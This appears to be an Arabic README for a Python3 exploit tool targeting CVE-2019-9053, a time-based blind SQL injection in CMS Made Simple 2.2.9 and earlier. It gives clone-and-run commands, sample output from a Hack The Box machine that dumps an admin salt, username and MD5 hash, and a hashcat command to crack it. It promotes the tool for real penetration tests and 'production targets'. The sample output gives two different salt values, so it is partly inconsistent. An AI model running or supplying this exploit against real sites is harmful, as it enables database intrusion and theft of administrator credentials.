
استغلال Python3 لثغرة CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). بدون تبعيات، حقن SQL أعمى قائم على الوقت → تفريغ بيانات اعتماد المسؤول. HTB Writeup: تم الاختراق.
منفذ Python3 خالص للاستغلال الأصلي في Exploit-DB #46635 بواسطة Daniele Scanu. حقن SQL أعمى قائم على الوقت لتفريغ بيانات اعتماد المدير من تثبيتات CMS Made Simple القابلة للاستغلال.
✅ لا اعتماديات خارجية (requests فقط)
✅ مكتوب أصلاً لـ Python 3.6+ (f-strings، عامل walrus)
✅ مخرجات ملونة جميلة (ANSI)
✅ مستقر وسريع (تفريغ خلال ~3-5 دقائق على الاتصالات المتوسطة)
✅ معالجة المهلة/الأخطاء للأهداف الإنتاجية
✅ مخرجات جاهزة لـ hashcat (تنسيق salt + MD5)
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt
TIME = 3 # Sleep time (slower = more stable)
timeout = 20 # Request timeout
chars = '...' # Custom charset
المؤلف الأصلي: Daniele Scanu
Exploit-DB: #46635
منفذ Python3 والتحسينات: Tim Karov
رخصة MIT - انظر LICENSE
⭐ امنح نجمة إذا كان مفيدًا! يُستخدم في مختبرات HTB/TryHackMe والاختبارات الاختراقية الحقيقية.